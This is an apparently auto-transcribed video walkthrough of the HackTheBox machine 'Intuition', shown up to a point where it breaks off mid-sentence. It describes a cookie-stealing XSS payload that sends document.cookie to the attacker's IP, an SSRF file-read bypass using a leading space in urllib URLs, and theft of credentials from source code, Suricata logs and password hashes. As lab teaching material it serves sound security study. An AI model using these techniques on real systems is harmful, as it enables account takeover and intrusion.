What's going on YouTube? This is Ipsec. We're doing Intuition from HackTheBox, which starts out with some cross-site scripting that gets you access to a web panel that is vulnerable to server-side request forgery. And when it goes to download that URL, it's using an old version of Python's URLLib that is vulnerable to a URL parsing attack, I guess. If the URL begins with a space, it doesn't properly process the scheme. So you can use some blacklisted schemes if they try to prevent you from, say, like using the file wrapper. You can use that to leak the website source code that points you at FTP that then has an SSH key, and you can log into the box. From here, there's a lot you have to do. There is Suricata installed that's logging some FTP passwords to plain text. So you pull that, you crack a password out of the database, you put all that together, and you can exploit a binary that is using Ansible Galaxy to install a role. There's also a really fun unintended. If you didn't want to do all that recon on the box, they can just get into the Selenium container and use some weird Docker privesc that we're going to show you. So with that being said, let's jump in. As always, we're going to start off with an nmap. So -sc for default scripts, sv enumerate versions, -vv for double reverse. This gives us the TTL and things like that. OA output all formats, put in the nmap directory and call it Intuition. Then the IP address of 10.10.11.15. This can take some time to run, so I've already ran it. Looking at the results, we have just 2 ports open. The first one being SSH on port 22, and its banner tells us it's a Ubuntu server. We also have HTTP on port 80. Its banner tells us it's Nginx running on Ubuntu as well. And it's also redirecting us to compressor.htb. So let's go ahead and add this to our host file. So I'm going to do sudo v etc host, and then we can add 10.10.11.15. and then compressor.htb. And let's go take a look at the site. So I'm going to go to HTTP, compressor.htb, and we just get a page. It says, welcome to a file compression service. You can upload text, PDF, and Word docs, and then it will go ahead and compress them. We also have a email address and a link here that says, inform us by submitting a report here. And it gives us a new domain. If you can see the bottom left, it says report.compressor.htb. So let's go ahead and add that to my host file. So I'm going to add report compressor.htb. Before we go taking a look at this site, let's just play with this compression to see what there is. So I'm going to go to HTTP. This is Intuitions. And we got to give it a text file. So let's just do hello world to test.txt. So let's see how this compression thing works. So I'll select the file. I'm going to send it through Burp Suite so we can inspect all the requests. Intercept is on, compress it, and we're going to send a form that just says hello world, and we got the file name here. If I go in repeater tab, it's just going to send me a compressed object back. Now, what I was looking for here, at least hoping for, is like it would redirect me to where the file stored on the server, and then we could play for like file disclosure types of things. But since it's just giving me the data back as compression, not like pointing me towards a file, I don't think there's going to be really any types of attacks here. It does give us the cookie. So if we look at this, let's see, what is this? It looks like it's going to be a Flask cookie. I just say Flask because it kind of looks like a JWT, but with JWTs, the data's in the middle one here, and Flask, it's in the first one. So I'm just really assuming right now this is Flask. I don't know what else it could be. The other thing we could do to identify what technology is running, I always like just looking at the error message. So if I go to compressor/does-not-exist, I'll get a 404 message. And believe it or not, this looks pretty generic, but we can track this down to be coming from Werkzeug, which is a Python library that Flask uses to do a bunch of HTTP things. So if you want to go to Werkzeug, so we can do github.com, Werkzeug, and we can look at the code to see exactly where this form comes from. Because I think there's another framework that has something very similar, but it won't put this doc type HTML. And I think it also closes the HTML tag. So these very small things are the fingerprints you can use to identify where they're coming from. And if you went in Werkzeug, if you are logged into GitHub, you could probably just search for strings and find it that way. But if we just go in source and go to exceptions, that's going to be where like all the HTTP exceptions are made. And scrolling down at get body, this is the essentially template it uses to generate all those pages. So you can see we have the doc type HTML, then we have HTML language equals EN, and then we have title, self code, self name, and then self name again, and description. So we can compare these two, what we see here. And it's very similar. We just are filling in things, right? This is the code, this is the name, this is the name again. The only thing that's not really making sense is we have the paragraph tags here, and we didn't see paragraph tags here, right? So it could either be in what environ is. If we look at the 404 exception, we don't see the paragraph tags. So this is the name not found, right? So the other thing that it could be is if we look at, let's see, where is the body? It's under get description. So we look at what get description is, and we can see it's putting in those paragraph tags. So we can see exactly the code that is generating this 404 page, and we can be pretty darn confident this is going to be coming from Werkzeug, because if another framework tried to implement this, chances are they make some type of mistake. Maybe they don't put the trailing line break. Maybe they don't put this doc type HTML. Maybe there's a trailing space somewhere. That's just kind of how you can programmatically identify the frameworks in play. Doesn't really matter. That was a long tangent. Hopefully you got something from it. But I don't have many ideas on how to attack compressed file because, again, I'm just giving it text and then it's compressing it and sending it back. If it was writing to the disk and then pointing me to where it wrote to, I'd have ideas of things to do, but nothing. So let's go take a look at the report submission. And we can see what happens to our reports here. So when we report it, developers will look at it. If the bug requires attention, it will be escalated to an administrator, and they'll get back to us. So let's just go report a bug. And when we click that, it directs us to auth.compressor.htb. So let's go ahead and add this to our host file. So we can do sudo v etc host, and then we can add auth.compressor.htb. And at this point, I probably would be doing some type of recon in the background, like running a GoBuster virtual host scan to see if there's any other domains running. But in this case, I'm not going to do that because I think it'll be a waste of time. We just click report bug. It says we need to log in. We can register an account. So I can do ipsec and a password of password. We click register, and now we can log in. So ipsec password. And again, I always like intercepting things. I didn't do it right there just because if you noticed periodically when I was going through burp, it wasn't finding that auth domain, even though I added it to my host file. And that's because burp has its own like DNS cache and it would take like a minute for it to update. So that's why I disabled it. The first thing I noticed right here is something really odd about this cookie. So we have user ID. It's just straight JSON and then a pipe. And I'm guessing this is going to be some type of cryptographic signature. So the first thing I'm thinking of, can we attack this cookie somehow? And I wonder if I can register a name and put a double quote in my name and maybe inject a extra role, right? So that's going to be the first thing I try real quick. So let's log out. And I actually have not tried this before. So this part will be live. I didn't try this when initially solving the box, but I figured why not? It looks like a valid attack. So let's see. I'm going to intercept the request and then we can register. Our request is here. And the first thing I want to do, can I put a double quote here? Because if I can't, then why bother, right? So we can do ipsec quote and password. And I'm actually thinking it's not going to be vulnerable because this just magically worked. Let's look at what my data is. And we have the library or the application escaping that double quote I put in. what I was hoping to do is we'd have this cookie. And then if I registered a name with a double quote, I was hoping I could then kind of like inject my own, right? So if I could go and do this, and this entire string would be my username. So then when the application appends the double quote and a comma, it creates this cookie and signs it for us. But since it was escaping the double quotes, we have no way to break out of this value. So we can't do any type of JWT attack like that. So let's go ahead and click on report bug and see what is here. So we can turn intercept off, and we have a report submission form. So let's just do a title of test and test for basic cross-site request, not cross-site request, XSS attacks. So we can do image source is equal to, cross-site scripting. That's what I was trying to say. HTTP 10.10.14.8. We'll put it on port 8000. And then we'll end that image tag. So let's just stand up a netcat listener on port 8000. I'm going to add the K flag so it keeps the socket open. And we can submit this bug report. And almost immediately, we get a callback here. Let's see. This is from dashboard.compressor.htb. So we got yet another host file. So let's do sudo v etc host. And again, if I was running GoBuster, I would have probably found this domain as well. Let's go http dashboard.compressor.htb, and we don't have permissions to see this. So it looks like we need to not be in the user role, right? So let's see. We have cross-site scripting. We can try stealing the actual cookie. So let's do a image source is equal to X, and then on error, and we can run JavaScript here. So I'm going to say fetch, and we'll do HTTP 10.10.14.8 port 8000, and then cookie is equal to, close that out, B2A. This is going to base64 encode, and we're going to give it the cookie. Let's see. Actually, before we do that, we can actually look at one of our requests or how the cookie is stored, I should say. So if I go in my storage tab, we see HTTP only is set to false. So since that's set to false, we know the cookies should be able to be transmitted this way. If it were set to true, then we'd have to use simulate the user's browser and access things because we couldn't just view their cookies. I'm sure if you go to ipsec.rocks, search XSS, you'll find plenty of videos where we do things like that. But since this one is set, doesn't have HTTP only, we can just exfil it this way. So let's see, we've closed out B to A. We can close out that. And that looks good. /image. And I'm actually going to put a semicolon here. I don't think that's needed. That is listening. Copy this just in case I made a mistake. And then we can wait like 30 seconds to see if we get a cookie. While we go, let's see, I'm waiting. We do fetch. Oh, there we go. I was just going to double check my payload worked, but everything is good. So we have the cookie here, and it is base64 encoded. So let's do echo-n, base64-d. I'm going to do a trailing echo just so we have a line break after my command. If I didn't do that, it gets really... Oh, wait. If I didn't do that, we have just my terminal going right after the cookie. I just always like putting the echo there. So we have user data is equal to this string. And this is probably just going to be the same type of cookie we had, which is a JSON object. So let's decode this. We could pipe it. We can't pipe it over to JQ just yet because we have this pipe character. But we can look at it, and user ID to username Adam, role is web dev. So let's go ahead and swap out our cookie for this one. So let's go into the storage tab again. And where user data is, I'm going to replace that with the new cookie. And then I'm going to go to dashboardcompressor.htb, and we get logged in because we are a web dev. And it looks like that's just echoing the role we have. So looking at this, we can see priority for some, this is set to 1. I don't know exactly what priority is. If we think back though, from the home page, going here, we can raise a ticket with the administrator. So I'm guessing administrators look at the priority number. If we click on 1, we can set to resolved, we can delete it, and we can set high priority. And that looks to be about all we can do. So I'm going to examine a request to set high priority and see exactly what it looks like. So if we do this, set high priority, I like setting it to repeater just so we can see what it does. It's going to redirect us back to, where is it redirecting? Location /. So it just redirects us back to the dashboard. Whenever I have an API endpoint like this, I always like sending it without my cookie. And I actually think there may be an IDOR vulnerability here, because I was expecting to get like an authorization denied, right? So in order to validate this, because when we're doing pen testing and things like that, it's not always just about the shell. It's just about everything we can do, right? So I'm looking at this. I open ticket 4, priority is 0. I'm going to set high. Priority is 1. And if we go back here, I'm going to set low. That's going to be 0. So let's go on our repeater tab, and I'm going to get rid of a cookie. And I think we're on report ID 4, right? Yes. I will send this request, refresh, and it doesn't change. So we actually don't have any vulnerability here. It's just behaving. Oh, it's actually redirecting us to login when we don't have cookie. I did not notice that, but just things I test when I'm playing with web applications. So if we go back and file a bug report, so let's go here, report a bug, test, submit. We can see Adam is 21. And I'm guessing if we set the priority to 1, an administrator will potentially view this ticket. And when the administrator does view the ticket, maybe they're vulnerable to cross-site scripting as well. So do I have my payload? I may actually have to rewrite that payload, which is a bit of a pain. Let's see. Proxy, HTTP history, post. Let's see. I'll just rewrite that. That's fine. So let's do this again. We'll do test, and then image source is equal to X, and then on error is equal to fetch HTTP 10.10.14.8, port 8000, question mark C is equal to plus B2A document.cookie. And we close that out, close out the fetch, semicolon. There we go. I think that is all good. So let us stand up our netcat listener. It's on 8000. I always like doing -K as well. Let's see. The other thing we want to line up is changing that priority. So let's go back to the repeater tab. I think the report ID is going to be 22, right? Because we're at 21 now, so the next ticket in will be 22. So what I'm going to do is intercept this request, send this to repeater. We can name this make bug report. And then this one will be escalate ticket. And that's actually not going to work because I don't have my cookie there. That's ipsex cookie. Let's see. I may just intercept another one real quick. We can drop that. Intercept on. Escalate ticket. Put the cookie back. Okay. So we're going to report the bug, escalate ticket, and then if we view the dashboard, hopefully we'll see our ticket and it's got 1. So give this probably 30 seconds. Oh, it's already been hit. So let's go examine this base64 data and we'll see if this is the, actually got hit twice it looks like. They look different. I'm just looking right here, TMPR, and this is TNPA. So let's look at both of these. So we can echo. We'll look at the second one first, I guess, because that's right here. Base64-D. And then we want to actually view this. So echo base64-D again. And this is the admin cookie. So this is the one we definitely want. I'm going to guess the other one is a moderator cookie. Let's go and come back here. We can go in storage, paste this, refresh, and now we're at the dashboard for admin. And we have a few extra things. We have this report ID. This looks the same. The only difference is we'll only show ones with a high priority. There's the full report list where we can look at every single report and see descriptions. Let's see what else there is. If we click create backup, that's weird. We don't know exactly what happened. It just says it succeeded. So let's go take a look at Burp Suite to see if we can figure out what's going on here. We make a request to backup, and let's just intercept the response to this request. It sends us a redirect to /, and that's it. I'm guessing this session right here, this is going to be the Flask that just says backup and upload succeeded. So that is a bit odd. If we click create PDF report, it wants us to enter a URL. So this is probably going to be some type of server-side request forgery. So let's just have it reach back to us if we make a request to 10.10.14.8. I'm going to do port 8000. I still have my netcat listening. So let's now generate a report. And we can see it makes a connection back to us using the Python URLLib. We also have a cookie here. I wonder whose cookie this is. Base64-D. Admin cookie again. But I'm kind of confused. Normally I don't see Python URLLib. The most common Python library to make request is going to be called request, right? So if we do import requests, and we can say request.get HTTP localhost port 8000. The user agent for request is Python/request. So one of the main differences between URLLib and request is request will only do HTTP. The Python URLLib, this allows other things, like we can do a file wrapper. So we can try doing file etc, passwd like this, and URLLib should process that file. However, we get invalid URL. So my first thought here is maybe the application's just looking at what we type here, and based upon user input, it says, oh, it has file, we can't allow that. So what I'm going to do is I'm going to have it make a request to me, and then I'm going to send a redirect to go to the file etc passwd. So that's my first thought on this attack. So let's make dir dub, and I also want to scroll up. Let's see. We need a request. So this is going to be 302.request. And what does this look like? HTTP history. We want to send this line, and then we want to send this line. 2 line breaks. Okay. So what I'm going to do now is do nc lvnp 8000, and whoever makes that request to us, we're going to hand jam that text in. So if I do localhost 8000, that did not work. We made that. I had expected it to send a thing back. I wonder if it just can't redirect to file. Let's see. Curl localhost 8000. I'm going to add a -v so we can see the headers. That is what we sent back. That looks good. Is it -l to follow request? Clear. Something is not working. Oh, file protocol is not supported or disabled in libcurl. So curl's not allowing it because it's disabled. However, it looks like everything is working, right? We could also show this in Burp Suite. So if I go here, let's just change our host. We can say localhost 8000. Okay. Doesn't matter what we send it because this is what we want back. And oh, we only want 2 lines back. We got 5 and 6. Is Netcat like putting 2 blank lines? Didn't do anything there. Do 1 line. That's bizarre. This should work though. So this should still send us the redirect request. So let's do HTTP like this. Okay. Unexpected error. So it made a request back to us and then still had an error message. So it looks like that does not work. I'm guessing it checks every time it reaches out. So my next thought is, let's see exactly what happens if it gets a valid file. So let's just do Python 3-m HTTP server, and we'll give it HTTP to us, generate the PDF report, and it's saved it. So let's move downloads report. What is that number? Download 43535. 43535 here. And we can run exiftool against this. And let's see. We can see it's made with WK-HTML to PDF. So let's go ahead and Google that for vulnerabilities. Let's see, there's one that pops up real quick. Server-side request forgery. So this is saying we can potentially use a iframe and get data. So let's try that real quick. So I'm going to make v index.html, and then we can say, well, let's just give it the HTML tag. And then iframe source is equal to, first I want to just see if the request forgery works. So I'm going to do this /success. Okay. And I suppose we should have done this with the redirector, right? We know file is not working, but we could have tested with an HTTP redirect to make sure everything is working. We never actually did that. So I'll try that right after this. So we generate it, we get an unexpected error. We hit, and then we hit success, and it did A404. So let's touch success. We can say, please subscribe. There we go. I'm just curious if the PDF will now tell us to subscribe. Success. We got a not found still because our message is not in www. Okay. So it looks like our iframe is working. I actually don't see please subscribe. But it definitely hit it. That's weird. Let's see. Success. We can say height is equal to 500, width is equal to 500. Make the little window bigger because in this we can't scroll. So maybe it's at the very bottom is what I'm thinking. So we generate PDF. Frame load policy interrupted by policy change. So weird error message. We can still, I guess, try using the file wrapper, but it does not look like this is going to be successful. So let's v www index, and we can say file etc passwd, generate PDF, and unexpected error. So nothing is working at all. I did say we could play with this 302 request real quick to make sure like it works. So HTTP 10, 10, 14, 8, 8000. I'll call success. So I'm going to do sudo netcat lvnp 80. We'll pipe the 302 request in. And then we can say Python 3 HTTP server. Did I say port 8000? I did. So if I curl follow localhost 80, we can see my whole logic is working, right? It did the 302. We sent it. We said, hey, we're not here. Go here. And it redirected. So all I'm doing here is testing my theory. Like, did how I set up that whole netcat thing work? Yes, it did. So if we could access that file wrapper that way, it should have worked. We looked for vulnerabilities in the PDF parsing library, but we never did in Python, right? And the reason why is normally I don't look for vulnerabilities in major libraries like that because it's just not that common. Doesn't mean it's something you should not do. It's just I wanted to show like I don't always just go for the right thing first, right? I always tried all those other attacks because I find those to be more common than something like this. So I have this URLLib. Let's go over and Google that plus exploit. It's normally my first go-to. And we see quite a few results. Let's see, what does this blog post say? Is this going to be what we want? It looks good. So let's see. Essentially, all this blog post is saying is if you prepend a space to the URL, then it's going to parse it a bit differently, right? So right here, they're doing URL parse, and they give it this URL, and it correctly puts the scheme, HTTP, in that variable, right? But if we do a space and then the URL, the scheme is blank, the path is going to be space in this, and it's still going to go and download this. So this works because the script is just looking for blocked schemes, right? Does this have a list? So like if scheme is equal to file, gopher, expect, PHP, dict, FTP, glob, data, then it gets blocked. But since if we prepend the space, the scheme never gets set and we can bypass it. I see expect. That's the very first thing I like trying because if the expect library is there, then we can just run commands. We don't have to worry about getting a file, right? So that's going to be the first thing I test for. So let's go and find where we were. That's a gateway timeout. There we go. So I'm going to do a space, expect, and then ID. And I have no idea if this is going to work. I've never really seen expect used and worked in Python. I've actually never got it really working in PHP because the library is just always disabled. But yeah, I figured I'd try it out and we get unexpected error. So let's do a space, file, etc passwd, generate the report. And there we go. We finally have a file disclosure vulnerability. So let's go and figure out where we are. So I'm going to do proc self CMD line. So this is going to get the CMD line of whatever process we are running. Whoops, CMD line. There we go. And we are app code app.py. So let's go ahead and say app code app.py. And here is the source here. And it's kind of a pain just because of lack of line breaks. but we can kind of just read this. So from Flask, import Flask redirect from blueprints. Let's see. We have a secret key, so I'm guessing this is what it uses to sign all of the cookies. What else do we have? Let's see. We have auth. We already got admin, so I'm not really that concerned there. We do have blueprints, dashboard. So let's go and import the dashboard thing. So we can say apt code, and then, where is it? Blueprints, dashboard, I'm guessing. Blueprints, dashboard.py. Let's see, does this line exist? It does. So this is going to be the code where it uses to generate the dashboard. And the main thing I'm looking for here is what is that backup doing, right? Glancing through, this is, okay, this is blocking file FTP and FTPS. So this is the generate report functionality. We probably could have used Gopher potentially or something like that. Let's see, what else do we have? Template, create PDF. Here /backup. And what are we doing? So we make an FTP for ftp.local, and then we log in with FTP admin and this credential. So let's take a note of all this real quick. So let's see. vnotes, ftp.local, and then we want ftp_admin. I can remember that, and this password. Okay, so we have that. Let's try that URLLib thing. And this is key because it's URLLib, not request. If there's request, I'm pretty sure request doesn't support FTP to begin with, so you wouldn't be able to do something like this, right? So we do FTP admin : the password at, what is the server? ftp.local, generate the report. And it looks like we get a response back. There are 3 files. We have a private key, welcome note PDF, and welcome note text. So I want to download this private key real quick. So let's go ahead and grab this. So we can say /the key, and let's copy this. I'm going to do v key, paste this, and then we need to put this on a new line. Keys end with a line break. That looks good. Chmod 600 key. And then let's see. We want to see who this key goes to. So if I cat the key, and then we grep-v to remove the header and footer, like that -- whatever, and we base64 decode it, and then pipe it to xxd, normally we see who the key belongs to at the very end because the private key has the public key appended to it. We don't do that here because if we go to the top, we can see it is encrypted. So this is a protected key. So we need to know the password to it. We could try like using John the Ripper to attempt to crack this key, but there were 2 other files in this, welcome note, PDF, and text. I'm going to check those first. So let's look at the welcome note to see what's here. Generate. That failed. FTP. Oh, it failed because we did not have the last character. Copy there. We get it. And Dear Devs is talking about how they're thrilled. We have attached a SSH private key to the email. You can use this passphrase to decrypt it. So let's go ahead and try this. So we can do SSH keygen -p. This is going to change the password to the key. We're going to specify the key, put it in, and it says the key has a comment dev account at local, and we save the key with the new passphrase. So if we now do the same thing we did with grep, we have dev account at the end, because it's no longer an encrypted key, we can do sh-i key dev account at compressor.htb. And we get logged in. Awesome. And from here, there's really 3 paths we can take. 2 of those paths lead to the intended route. The third path that's way off yonder will do an unintended privesc that I'll show at the end of the video. I'm going to do what I normally do when I first land on a box, and that is dump the database, right? So we want to look at where the database for the account subdomain is. That's the thing that we use to like log into the dashboard and things like that. So I'm going to cat the etc nginx sites enabled, and let's see what's running. So everything is looking like it's a proxy pass to 127.0.0.1.80.80. If I do SSLNTP, we don't get to see the PID of the web server because we're not running as a web server ourselves. If we're root or whatever the web server is running as, we'd see the PID right here next to process. And we go to like proc that PID CWD and get into the directory that way. We could try like ps-ef grep on 8080. And it looks like it's kind of going to Docker, so that doesn't really help us all that much. So let's just kind of guess. Most of the time, web servers are either in var dub or they're going to be in opt, right? So if we looked at opt, there is quite a few. We have FTP, Google, Playbooks, Runner 2. I don't know what those are, but in dub, we have this app. If I go in app, it looks like this is the application because we do see blueprints. So we want to find the database. I'm just going to do a find.-name star.db. And we see there is an auth database at users.db and reports.db. If I didn't find this, then I'd be going through like config files and looking for a like MySQL credential or something like that. But most Flask websites do use SQLite. So we're going to dump the users. So I'll do SQLite 3 users.db.dump. And we get 2 values. So we have admin, which is this. So let's copy this. V hashes admin colon. And then we also have Adam. So I'll grab this. And his is also called webdev. That's a bit odd. We can do Adam and post this. Let's cat this and copy. And then I'm going to go over to hashcat, and we can attempt to crack these. So let's do SSH Kraken, which is just a box on my network. You can use hashcat on your main machine. Just don't do it in a VM because it'll go much slower in a VM than the host operating system. So let's do v hashes. I'm going to call this intuition. Paste this. /hashcat. Give it the file. And then the word list, opt word list rocku.txt. And we also want to give it the -- user flag because we did admin colon or username colon the hash. It's either user or users or username. I always get the argument mixed up, but it looks like it is going to crack. It is format 3120, Python Werkzeug SHA-256. So everything seems to be working. So, oh, there we go. It just started and it's finished. So we can get rid of the dictionary and then do -- show. And this will tell us what it cracked. So Adam is Adam Gray. That's the password. So if we go back to the box, we can look at what users are on this box. So cat etc passwd, and I'll grep for everything that ends in sh. There is Adam. So we can try su Adam. And then put in that password, and doesn't work. I'm just going to paste my clipboard so I can see that is indeed the password I tried. Let's do v creds Adam Gray. Save that. So we don't know exactly what that password goes to. There was FTP, so we could try ftp.local. And it's taking its time. I can't find that FTP directory. Was it ftp.local? Where was it? That's in dashboards, right? cd dashboard, cat this. What is that FTP? ping ftp.local. I'm actually surprised I can't seem to ping ftp.local from this box. I guess that's not a domain. Let's see, grep ftp.local-r. I would have thought, oh, ftp.local is probably the Docker host name, and this host that I'm on isn't configured to use Docker DNS entries, I'm guessing, right? So that's why I can't resolve it. Let's see. So to do this, let's just do a ps-ef-forest --s. And this is going to let us enumerate Docker a little bit. We can't do like a Docker ps or the Docker commands because we're not a member of the Docker group. But we can list running processes on the box, which can generally help us out quite a bit. So let's go through this. We have audit D, DHCP. This is SSH, so this is going to be us. Nginx there. Here we go. We have a Docker proxy 127.0.0.1 going to 80.80, 172.21.0.2. Since we saw the Nginx rules pointing to localhost 80.80, I'm going to guess this is going to be the web server Docker. Container port 80. So yeah, this is probably going to be the web server. There is something on 4444 on 172.21.0.4. So this is probably going to be the FTP server, unless there is a extra Docker that we just don't know about, which is very well possible. Let's see, what else do we have? We have this one, FTP server or FTP server.py. This looks good. Going through this, we don't really have an IP address that is just going to the container.sock. Let's see, code.py. This is another Docker. Let's see, do we have IDs up here? Container port? No, we don't. So this has a VNC server, Selenium, Firefox. So this container is doing some browser automation. That's going to be part of the unintended. And at the end, we just have systemd. So let's see exactly what port quad 4 was. So if we curl localhost 4444, let's do -v. That is a web server, not FTP. So this is probably going to be that automation container I just mentioned that was doing Selenium things. So let's ignore port 4444 now. Let's look at what's listening on the box to see if there is an FTP. And there is. We see it right here, 127.0.0.1.21. And that's going to the Docker container at 172.21.0.1. I'm kind of confused. I'm surprised 21 didn't show up in our PS. Let's see. We do a space 21, Firefox. Yeah, I thought I'd see this in like the PS output, but we don't. Let's go to dev shm and we can FTP localhost and then Adam Gray was the password. If we do dir, there's a backup directory. So let's go in there. Looks like another directory, run01. And then we have 3 files. So we have runtest.sh and then run01, run1 and run1.c. Okay, let's take a look at what these files are. So I'm going to cat the runtest.sh first. And what we get is some bash scripts. We have run01 list, and it says how to do things, but we need a auth code. It looks like it tells us a part of the auth code right here, and then stars out the last 4. Let's try running this. So I'm going to do chmod +x, run01, and it says we can do run01 list, and we get authentication failed. I guess we need even auth for that. Let us look at run01.c. And this looks to be the source code of the application. And I'm guessing it has something to do with Ansible because we see these defined here. And then we also have a auth key hash. So right off the bat, I'm going to guess that, let's see, cat run test. I'm going to guess the MD5 sum is either going to be this with the stars, or we're going to have to brute force each of these characters to find out the true MD5 sum. So let's do a echo-n on this, MD5 sum, CE14. I'll do it without the -n just in case the line break is there. So if it's CE or C1, we know we're in good shape, but it's 0F. So our hash is completely different. So we have to figure out what that auth key is going to be. But we want to look through the rest of this. So we have list playbooks. It's going to open the playbook location and then load the playbooks, I guess. We got run, install. And right off the bat, I'm noticing something dangerous here. On run playbook and install role, it's just doing a system command. So if we can inject into this, we can do command injection, because system is like doing bin bash -c, and then this is where user input is, right? I'm guessing it probably should have used like exec VE, because that way you wouldn't be able to escape arguments, right? Because exec VE is going to require like the binary and then arg1, arg2, arg3. And when you do it that way, you can't really use the semicolon or pipe character to escape. So that is going to be a vulnerability within the script that we've spotted, as long as we control input here. So run command, playbook bin, inventory file, playbook location, playbook name. I think playbook name, which sounds, let's see, how is this passed? Run playbook. Playbook name. So this looks like it's getting it from the directory listing. So in order to get user input there, we'd have to be able to write to the directory where playbooks are to put a tainted playbook. And that's not really that great for us, because if we can write to that directory, we can probably just write to the playbook itself and insert a command in the playbook. So I'm not too concerned about the run playbook thing. Install role. We have role URL. So this is what I want to see. Role URL. Let's search for install role. And right here, we install the role, and we're passing in argument straight from standard in. So we have pretty much RCE right here. So we want to be able to call this binary, hit install role, and point it towards system. Now, the downside, if we do sudo-l, we don't have the password for dev account. The binary has to be running as root, right? So it either has to be like a set UID, a capability, or a sudo rule. And we don't have any of those right now. So it doesn't really help us. We can start trying to crack this auth code real quick though. So let's see, UH7I. Let's go back over to hashcat. And actually, how do I want to do this? Let's see. Well, cat run a 1.c. Let's grab the hash, go to hashcat, and what we want to do is a mask attack. So we'll do hashcat. If we do -help, let's see, does it show us? We search for mask. So this is going to be attack modes. Maybe it's called brute force attack. Attack mode 3 is what we want. And what this is going to allow us to do is specify a portion of the hash. And here are the character sets we can use. So if we do $A, it's going to do pretty much all of ASCII, right? Lowercase, upper, digit, symbol. If we wanted to just brute force characters in the lower position, we do $L. So to do this, we're going to specify /hashcat attack mode 3. MD5 is going to be mode 0. And then we want to specify the hash. So we'll go and grab this. And then the portion of the key we want. So that was in run test. And we'll grab this, copy, paste, and 1, 2, 3, 4. There's 4 characters. Let's just do 4 ASCII, right? Because we see it's upper and letter, so we could probably like make our own character set of just upper and digit, but doesn't matter. We can just do the whole ASCII thing because it's MD5 and MD5 goes extremely quickly. We see it cracked almost instantly, and we have the full auth code. So let's go back here. Let's do vnotes. Auth code is going to be this. It doesn't really bias anything though, because run01, this isn't going to be set UID. We don't have a sudo entry for a guy, or we don't know dev account's password, so we can't even check sudo. Let's see, find. Let's do -name runner1 on / to see if it exists anywhere else. To dev null. It doesn't. I think we'd actually have to do the / here. So this shows this point at dev shm run1, so that's the only place it's at. We did briefly see runner2, but we can't get into this directory. It is owned by sysadmin. See, can we do a group or like get ent group sysadm? Is that the command? Man, I cannot type. So we can see Lopez and Adam is a member of sysadmin group that can go into runner2. I'm guessing that's probably the next step we want because like we have command execution on runner1. I'm guessing runner2 is very similar. So if we do psef -- forest again, let's see if there's anything that sticks out. So going through this, let's see. So we have audit D. That's not too interesting. DH client, IRQ, syslog, supplicant, SSH stuff. Suricata is interesting, and we have it in Etsy Suricata, suricata.yaml. So let's go see if we can look at this. So we go to Etsy Suricata. If you don't know, this is like Snort. It's a network IDS. So I'm going to hide every line that starts with the comment. So we can do grep like this, I want to say. Grep-v. And then grep period for anything that starts. And let's see. Let's just get rid of anything that has a comment. So we got the rules. It's going to be parsing HTTP events, FTP, and IPsec. Let's see, do we have it going to like a log file? Logs there. So the default log directory is going to be var log suricata. So if we do ls here, we do have things and we can read them. We could also go into the rules and look at what rules are here. If you do a ls-la, you can see 2 rules kind of stick out. FTP events and let's see, Suricata rule sticks out as well. FTP and HTTP, and those stick out just because of the timestamps. Since this is on in Etsy, it means a zip or archive probably put it in here by the system. And if we do a stat against it, we can confirm that because the timestamp has a bunch of zeros. Now we look at the ones that have been edited. Let's look at FTP. If we do stat against that, you can see the modified time doesn't have all those zeros. And so that means this file was probably modified after Suricata was installed. So it just means I would probably look into what FTP events there are, right? Because this is non-standard configuration. We can see alert, FTP, any, so from probably external to the home network. Message FTP failed login attempt. If there is a user, I forget exactly how to read exactly what's going on there, but that should be printing failed logins, right? If you want to do a quick way to look at all the modified timestamps, you could do, let's do stat star, and then we can grep for file or modify. And this is a quick way of showing it. I know if you go to ipsec.rocks, I'll give you a find command. If you just search like find timestamp, it'll come up. A find command to show it like recursing the whole file system doing it. But if you just want to look at a directory quickly, this is a quick way to do it. You can see HTTP event, and there's the modify timestamp. So let's go into varlarg Suricata. And we know we want to get someone out of that sysadmin group, right? So if we do that get ent sysadm, we probably want Lopez or Adam. So I'm going to do a grep Lopez or Adam on star. We don't get anything. So I'm going to do a zgrep, and that's going to let me go into the gzip directories. And we have a couple hits. So let's just do less-S, and we can see what these are. So right off the bat, I see Adam's hit is going to be the HTTP user agent fuzz faster you fool. And this looks like it may be doing a virtual host scan, right? Because we just see the host name and then the user agent is that. So I'm going to not go for Adam. Let's see what Lopez has hit on. So we have 2 hits, and this is going to be username OK. This is FTP. So Lopez has some FTP hits. So what I want to do is grab the flow ID for this. Is there a flow ID? Search for flow. There we go. So the flow ID, this is going to be like a network sequence, right? So this is just an FTP connection. It flagged because he was logging in, but there's going to be like FTP password. There's a bunch of other things as part of that network chain. And the flow is going to let me view all of that. So I'm going to do a zgrep on the flow ID. And we can see how it goes, right? We can probably, instead of doing a less now, pipe it to JQ. Maybe not. How's that failing? It's probably because it's putting the file name first. Yeah. So let's just specify that file. Everything was in evejson.8.gz. JQ dot. There we go. That's easy to view. So let's look at this. So the first one, it's going to be an anomaly. It detected a protocol only in one direction. So here's the start. FTP, the reply is talking about the FTP library server that's used. Then we're sending in Lopez. The FTP server says, okay, send the password. And it's sending in Lopez and this credential. It says authentication failed, but maybe that's just not his FTP password, and that's his local password. So we'll do su-lopez, put in that password. And let's see, that did not work. Let's try the other flow ID. So we'll try this one here. I probably should have copied that password before clearing my clipboard, but oh well. Go here. And looking at this, username okay, send password. This has less Z's, I think. So this was login successful. Paste this, and we get logged in as Lopez. If I do a sudo-l, put in the password, Lopez can run runner2. So we're making progress. And at this point, we could either bring this binary back, the runner2 binary, or we can just play with it ourselves on the command line. I'm going to opt to play with it through the command line because I do think it's a relatively straightforward binary. It wants a JSON file, so I'm just going to give it a blank JSON. So I'm going to do sudo test.json, and it says run key missing or invalid. So let's go add a run key. And then we try it again. It says run key missing or invalid still. So we want to know exactly what it's trying to do with this run key. If we do a strings against this binary, and then we look for where run is. Right now we're at like error messages. This %s install %s, that's looking very familiar. This is going to be in the install role. We looked at it in runner1.c, right? But the main thing I want is around here. We have run key missing or invalid. There's a action key missing or invalid, invalid action. So we probably want to play with the action. So if we do run, let's go with a second nest and say action. And that's invalid JSON because we didn't close it out. Do the sudo again, and we have invalid action value. So if we looked at the source code, runner1.c, there are a few actions this does. This is just doing arguments from standard in. We're doing it in JSON. You have list, you have run, and you have install. I bet if we did a strings against that, let's do strings. We can grep for list, run, install. Let's see. We have list there, install. I don't see run. I wonder if that's like on a different encoding or something. -E, L. Was it L, B, and S? So list. Nope. I'm not sure what run is. Maybe it's run playbook is the action. But let's go back to our JSON, and we can say action, run. I don't know. Let's try it again. Action key missing or invalid for run. Or 